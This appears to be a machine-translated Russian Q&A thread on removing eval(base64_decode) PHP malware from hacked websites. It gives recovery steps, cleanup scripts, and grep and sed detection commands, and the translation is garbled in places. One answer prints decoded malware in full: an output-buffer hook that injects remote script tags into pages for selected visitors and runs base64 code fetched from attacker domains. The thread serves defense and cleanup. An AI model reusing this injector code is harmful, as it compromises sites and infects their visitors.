Как избавиться от eval-base64_decode, как файлы вирусов PHP?

Шаги по восстановлению и лечению вашего сайта (при условии, что у вас есть хорошая резервная копия).

1) Завершение работы сайта

Вы должны в основном закрыть дверь на свой сайт, прежде чем выполнять свою коррекционную работу. Это предотвратит посещение посетителями вредоносного кода, просмотр сообщений об ошибках и т. Д. Просто хорошая практика.

Вы должны сделать это, поместив следующее в свой файл .htaccess в webroot. (Замените «!! ваш IP-адрес здесь!» С вашим собственным IP-адресом – см. http://icanhazip.com, если вы не знаете свой IP-адрес.)

 order deny,allow deny from all allow from !!Your IP Address Here!! 

2) Загрузите копию всех ваших файлов с сервера

Загрузите все в отдельную папку из ваших резервных копий. Это может занять некоторое время (в зависимости от размера вашего сайта, скорости соединения и т. Д.).

3) Загрузите и установите Утилиту сравнения файлов / папок

На компьютере с Windows вы можете использовать WinMerge – http://winmerge.org/ – он бесплатный и достаточно мощный. На машине MacOS просмотрите список возможных альтернатив из Alternative.to

4) Запустите утилиту сравнения файлов и папок

Вы должны получить несколько разных результатов:

• Файлы идентичны. Текущий файл совпадает с вашим резервным копированием и поэтому не изменяется.
• Файл только с левой или с правой стороны – этот файл существует только в резервной копии (и может быть удален с сервера) или существует только на сервере (и, возможно, был взломан / создан хакером).
• Файл отличается. Файл на сервере не совпадает с файлом в резервной копии, поэтому он может быть изменен вами (для его настройки для сервера) или хакером (для ввода кода).

5) Устранение различий

(ака «Почему мы не можем просто ладить?»)

Для одинаковых файлов никаких дополнительных действий не требуется. Для файлов, которые существуют только на одной стороне , посмотрите файл и выясните, являются ли они законными (например, пользовательские загрузки, которые должны быть там, дополнительные файлы, которые вы могли добавить, и т. Д.). Для файлов, которые являются разными , посмотрите файл ( утилита File Difference Utility может даже показать вам, какие строки были добавлены / изменены / удалены) и посмотрите, действительно ли версия сервера. Перезапишите (с резервной копией) любые файлы, содержащие вредоносный код.

6) Просмотрите свои меры предосторожности

Независимо от того, как это изменить ваши пароли FTP / cPanel или проанализировать использование внешних / неконтролируемых ресурсов (как вы говорите, вы выполняете много фэгсов, fopens и т. Д., Вы можете проверить передаваемые им параметры как это способ заставить скрипты вызывать вредоносный код) и т. д.

7) Проверьте работу сайта

Воспользуйтесь возможностью быть единственным человеком, который смотрит на сайт, чтобы убедиться, что все по-прежнему работает, как и ожидалось, после исправления зараженных файлов и удаления вредоносных файлов.

8) Откройте двери

Отмените изменения, сделанные в файле .htaccess на шаге 1. Следите внимательно. Следите за своими посетителями и журналами ошибок, чтобы узнать, пытается ли кто-либо запускать удаленные вредоносные файлы и т. Д.

9) Рассмотрим автоматизированные методы обнаружения

Существует несколько решений, позволяющих выполнить автоматическую проверку на вашем хосте (используя задание CRON), которое будет обнаруживать и детализировать любые изменения, которые происходят. Некоторые из них немного подробные (вы получите электронное письмо для каждого измененного файла), но вы должны быть в состоянии адаптировать их к вашим потребностям:

• Tripwire – скрипт PHP для обнаружения и отправки новых, удаленных или измененных файлов
• Сценарий оболочки для мониторинга изменений файлов
• Как определить, взломан ли ваш веб-сервер и получить предупреждение

10) иметь запланированное резервное копирование и сохранить хороший кронштейн

Убедитесь, что у вас запланировано резервное копирование на вашем веб-сайте, сохраните несколько из них, поэтому у вас есть разные шаги, которые вы можете вернуться вовремя, если это необходимо. Например, если вы выполняете еженедельные резервные копии, вы можете сохранить следующее:

• 4 раза в неделю
• 4 х ежемесячных резервных копий (вы сохраняете одно из Еженедельных резервных копий, возможно, первую неделю месяца, в качестве Ежемесячного резервного копирования)

Они всегда облегчат жизнь, если у вас кто-то атакует ваш сайт чем-то более разрушительным, чем атака с инъекцией кода.

О, и убедитесь, что вы также создаете резервные копии своих баз данных – с большим количеством сайтов, основанных на CMS, с хорошими файлами, но если вы потеряете / повредите базу данных позади них, ну, резервные копии в основном бесполезны.

Во-первых, отключите свой сайт, пока не сможете понять, как он попал и как его исправить. Похоже, что это вредоносная программа для ваших клиентов.

Затем выполните поиск через ваши php-файлы для fgets, fopen, fputs, eval или system. Я рекомендую notepad ++ из-за его функции «Найти в файлах». Кроме того, убедитесь, что это единственное место, где ваш PHP был изменен. У вас есть автономная копия для сравнения?

Я страдал от той же взломанной работы. Мне также удалось расшифровать код, и, хотя у меня появился другой php-код, я начал с удаления вложенного PHP-текста, перейдя через каждый php-файл на сайте и удалив eval-вызов. Я все еще изучаю, как я его начал, но вот, как выглядела моя после дешифрования с этого сайта:

Чтобы декодировать зашифрованный php-скрипт в каждом файле php, используйте это: http://www.opinionatedgeek.com/dotnet/tools/base64decode/

И форматирование результата с помощью этого парня: http://beta.phpformatter.com/

Для очистки вам нужно удалить строку «eval» из верхней части каждого файла php и удалить папки .log из базовой папки веб-сайта.

Я нашел скрипт python, который я немного изменил, чтобы удалить троян в php-файлах, поэтому я отправлю его здесь для использования другими пользователями: источник кода из потока: замените ВСЕ экземпляры символа другим во всех файлах иерархически в дереве каталогов

 import os import re import sys def try_to_replace(fname): if replace_extensions: return fname.lower().endswith(".php") return True def file_replace(fname, pat, s_after): # first, see if the pattern is even in the file. with open(fname) as f: if not any(re.search(pat, line) for line in f): return # pattern does not occur in file so we are done. # pattern is in the file, so perform replace operation. with open(fname) as f: out_fname = fname + ".tmp" out = open(out_fname, "w") for line in f: out.write(re.sub(pat, s_after, line)) out.close() os.rename(out_fname, fname) def mass_replace(dir_name, s_before, s_after): pat = re.compile(s_before) for dirpath, dirnames, filenames in os.walk(dir_name): for fname in filenames: if try_to_replace(fname): print "cleaning: " + fname fullname = os.path.join(dirpath, fname) file_replace(fullname, pat, s_after) if len(sys.argv) != 2: u = "Usage: rescue.py <dir_name>\n" sys.stderr.write(u) sys.exit(1) mass_replace(sys.argv[1], "eval\(base64_decode\([^.]*\)\);", "") 

использовать тип

корневая папка python rescue.py

Это то, что пытался сделать злоумышленник:

 <?php if (function_exists('ob_start') && !isset($_SERVER['mr_no'])) { $_SERVER['mr_no'] = 1; if (!function_exists('mrobh')) { function get_tds_777($url) { $content = ""; $content = @trycurl_777($url); if ($content !== false) return $content; $content = @tryfile_777($url); if ($content !== false) return $content; $content = @tryfopen_777($url); if ($content !== false) return $content; $content = @tryfsockopen_777($url); if ($content !== false) return $content; $content = @trysocket_777($url); if ($content !== false) return $content; return ''; } function trycurl_777($url) { if (function_exists('curl_init') === false) return false; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_HEADER, 0); $result = curl_exec($ch); curl_close($ch); if ($result == "") return false; return $result; } function tryfile_777($url) { if (function_exists('file') === false) return false; $inc = @file($url); $buf = @implode('', $inc); if ($buf == "") return false; return $buf; } function tryfopen_777($url) { if (function_exists('fopen') === false) return false; $buf = ''; $f = @fopen($url, 'r'); if ($f) { while (!feof($f)) { $buf .= fread($f, 10000); } fclose($f); } else return false; if ($buf == "") return false; return $buf; } function tryfsockopen_777($url) { if (function_exists('fsockopen') === false) return false; $p = @parse_url($url); $host = $p['host']; $uri = $p['path'] . '?' . $p['query']; $f = @fsockopen($host, 80, $errno, $errstr, 30); if (!$f) return false; $request = "GET $uri HTTP/1.0\n"; $request .= "Host: $host\n\n"; fwrite($f, $request); $buf = ''; while (!feof($f)) { $buf .= fread($f, 10000); } fclose($f); if ($buf == "") return false; list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf); return $buf; } function trysocket_777($url) { if (function_exists('socket_create') === false) return false; $p = @parse_url($url); $host = $p['host']; $uri = $p['path'] . '?' . $p['query']; $ip1 = @gethostbyname($host); $ip2 = @long2ip(@ip2long($ip1)); if ($ip1 != $ip2) return false; $sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if (!@socket_connect($sock, $ip1, 80)) { @socket_close($sock); return false; } $request = "GET $uri HTTP/1.0\n"; $request .= "Host: $host\n\n"; socket_write($sock, $request); $buf = ''; while ($t = socket_read($sock, 10000)) { $buf .= $t; } @socket_close($sock); if ($buf == "") return false; list($m, $buf) = explode(chr(13) . chr(10) . chr(13) . chr(10), $buf); return $buf; } function update_tds_file_777($tdsfile) { $actual1 = $_SERVER['s_a1']; $actual2 = $_SERVER['s_a2']; $val = get_tds_777($actual1); if ($val == "") $val = get_tds_777($actual2); $f = @fopen($tdsfile, "w"); if ($f) { @fwrite($f, $val); @fclose($f); } if (strstr($val, "

CODE

")) { list($val, $code) = explode("

CODE

", $val); eval(base64_decode($code)); } return $val; } function get_actual_tds_777() { $defaultdomain = $_SERVER['s_d1']; $dir = $_SERVER['s_p1']; $tdsfile = $dir . "log1.txt"; if (@file_exists($tdsfile)) { $mtime = @filemtime($tdsfile); $ctime = time() – $mtime; if ($ctime > $_SERVER['s_t1']) { $content = update_tds_file_777($tdsfile); } else { $content = @file_get_contents($tdsfile); } } else { $content = update_tds_file_777($tdsfile); } $tds = @explode("\n", $content); $c = @count($tds) + 0; $url = $defaultdomain; if ($c > 1) { $url = trim($tds[mt_rand(0, $c – 2)]); } return $url; } function is_mac_777($ua) { $mac = 0; if (stristr($ua, "mac") || stristr($ua, "safari")) if ((!stristr($ua, "windows")) && (!stristr($ua, "iphone"))) $mac = 1; return $mac; } function is_msie_777($ua) { $msie = 0; if (stristr($ua, "MSIE 6") || stristr($ua, "MSIE 7") || stristr($ua, "MSIE 8") || stristr($ua, "MSIE 9")) $msie = 1; return $msie; } function setup_globals_777() { $rz = $_SERVER["DOCUMENT_ROOT"] . "/.logs/"; $mz = "/tmp/"; if (!@is_dir($rz)) { @mkdir($rz); if (@is_dir($rz)) { $mz = $rz; } else { $rz = $_SERVER["SCRIPT_FILENAME"] . "/.logs/"; if (!@is_dir($rz)) { @mkdir($rz); if (@is_dir($rz)) { $mz = $rz; } } else { $mz = $rz; } } } else { $mz = $rz; } $bot = 0; $ua = $_SERVER['HTTP_USER_AGENT']; if (stristr($ua, "msnbot") || stristr($ua, "Yahoo")) $bot = 1; if (stristr($ua, "bingbot") || stristr($ua, "google")) $bot = 1; $msie = 0; if (is_msie_777($ua)) $msie = 1; $mac = 0; if (is_mac_777($ua)) $mac = 1; if (($msie == 0) && ($mac == 0)) $bot = 1; global $_SERVER; $_SERVER['s_p1'] = $mz; $_SERVER['s_b1'] = $bot; $_SERVER['s_t1'] = 1200; $_SERVER['s_d1'] = base64_decode('http://ens122zzzddazz.com/&apos;); $d = '?d=' . urlencode($_SERVER["HTTP_HOST"]) . "&p=" . urlencode($_SERVER["PHP_SELF"]) . "&a=" . urlencode($_SERVER["HTTP_USER_AGENT"]); $_SERVER['s_a1'] = base64_decode('http://cooperjsutf8.ru/g_load.php&apos😉 . $d; $_SERVER['s_a2'] = base64_decode('http://nlinthewood.com/g_load.php&apos😉 . $d; $_SERVER['s_script'] = "nl.php?p=d"; } setup_globals_777(); if (!function_exists('gml_777')) { function gml_777() { $r_string_777 = ''; if ($_SERVER['s_b1'] == 0) $r_string_777 = '<script src="' . get_actual_tds_777() . $_SERVER['s_script'] . '"></script>'; return $r_string_777; } } if (!function_exists('gzdecodeit')) { function gzdecodeit($decode) { $t = @ord(@substr($decode, 3, 1)); $start = 10; $v = 0; if ($t & 4) { $str = @unpack('v', substr($decode, 10, 2)); $str = $str[1]; $start += 2 + $str; } if ($t & 8) { $start = @strpos($decode, chr(0), $start) + 1; } if ($t & 16) { $start = @strpos($decode, chr(0), $start) + 1; } if ($t & 2) { $start += 2; } $ret = @gzinflate(@substr($decode, $start)); if ($ret === FALSE) { $ret = $decode; } return $ret; } } function mrobh($content) { @Header('Content-Encoding: none'); $decoded_content = gzdecodeit($content); if (preg_match('/\<\/body/si', $decoded_content)) { return preg_replace('/(\<\/body[^\>]*\>)/si', gml_777() . "\n" . '$1', $decoded_content); } else { return $decoded_content . gml_777(); } } ob_start('mrobh'); } } ?>

Чтобы избавиться от этих вредоносных PHP, вам просто нужно их удалить. Если файл заражен, вам нужно удалить только часть, которая выглядит подозрительной.

Всегда сложно найти эти файлы, потому что, как правило, их много в вашем корне.

Обычно, если вы видите какие-то обфускации, это красное предупреждение для вас.

Большинство вредоносных программ легко найти на основе общих функций, которые они используют, в том числе:

• base64_decode ,
• lzw_decompress ,
• eval ,
• и так далее

Используя формат кодирования, они уплотняют их размер и затрудняют их декодирование неопытными пользователями.

Вот несколько команд grep которые могут найти наиболее распространенный вредоносный код PHP:

 grep -R return.*base64_decode . grep --include=\*.php -rn 'return.*base64_decode($v.\{6\})' . 

Вы можете запускать эти команды на сервере или после синхронизации своего веб-сайта на своем локальном компьютере (через FTP, например, ncftpget -R ).

Или используйте инструменты сканирования, специально разработанные для поиска таких вредоносных файлов, см.: Сканеры безопасности PHP .

Для образовательных целей, пожалуйста, найдите следующую коллекцию сценариев эксплойта PHP, найденную при исследовании взломанных серверов, доступных в сценариях kenorb / php-exploit GitHub (под влиянием оригинальной коллекции @Mattias ). Это даст вам представление о том, как выглядят подозрительные файлы PHP, поэтому вы можете узнать, как их найти на своем сервере.

См. Также: Что делает этот вредоносный PHP-скрипт?

1. Убедитесь, что обновлены все популярные веб-приложения, такие как WordPress или vBulletin. Есть много эксплойтов со старыми версиями, которые могут привести к сбою вашего сервера, и это, вероятно, произойдет снова, если они не будут обновлены. Не использовать при продолжении, пока это не будет сделано.

2. Если файлы продолжают заменяться, тогда в фоновом режиме запускается руткит или троян. Этот файл не может реплицироваться. Сначала вам придется сначала избавиться от руткита. Попробуйте rkhunter , chkrootkit , и LMD . Сравните вывод ps aux с защищенным сервером и проверьте /var/tmp и /tmp для подозрительных файлов. Возможно, вам придется переустановить ОС.

3. Убедитесь, что все рабочие станции, администрирующие сервер, обновлены и чисты. Не подключайтесь через небезопасные беспроводные соединения или используйте обычную текстовую аутентификацию, например, с FTP (вместо этого используйте SFTP). Только войдите в панели управления с https.

4. Чтобы это не происходило, снова запустите csf или сопоставимый брандмауэр, ежедневный просмотр LMD и оставайтесь в курсе последних обновлений безопасности для всех приложений на сервере.

Мои веб-сайты или веб-сайты, на которых я принимаю, несколько раз подвергались ударам с подобными атаками.

Представляю, что я сделал, чтобы решить проблему. Я не претендую на то, что это лучший / простой подход, но он работает, и с тех пор я могу упреждающе держать мяч в своей области.

1. решить проблему ASAP Я создал очень простой PHP-скрипт (он был написан, когда утюг был горячим, поэтому, возможно, это не самый оптимизированный код, но он решает проблему довольно быстро): http://www.ecommy.com/web-security / очистка PHP-файлы-из-Eval-инфекции

2. убедитесь, что вы знаете, когда что-то подобное снова появляется. Хакеры используют все виды аплоасов из SQL-инъекции одного из ваших внешних модулей, которые вы устанавливаете, чтобы перенаправить административную панель со словарными атаками или очень хорошо известные шаблоны паролей, такие как 1qaz … qwerty …. и т. Д. Я представляю скрипты здесь: http://www.ecommy.com/web-security/scan-for-malware-viruses-and-php-eval-based-infections

3. запись cron будет примерно такой: 0 2 * * 5 / root / scripts / base64eval_scan> / dev / null 2> & 1 &

Я обновил страницы, чтобы кто-то мог напрямую загрузить файлы. Надеюсь, он будет полезен для вас, как и для меня 🙂

Предполагая, что это сервер на базе Linux и у вас есть доступ к SSH, вы можете запустить это, чтобы удалить код нарушения:

 find . -name "*.php" | xargs sed -i 's@eval[ \t]*([ \t]*base64_decode[ \t]*([ \t]*['"'"'"][A-Za-z0-9/_=+:!.-]\{1,\}['"'"'"][ \t]*)[ \t]*)[ \t]*;@@' 

Это охватывает все известные реализации base64 и будет работать независимо от того, окружен ли текст base64 одиночными или двойными кавычками

EDIT: теперь работает с внутренними пробелами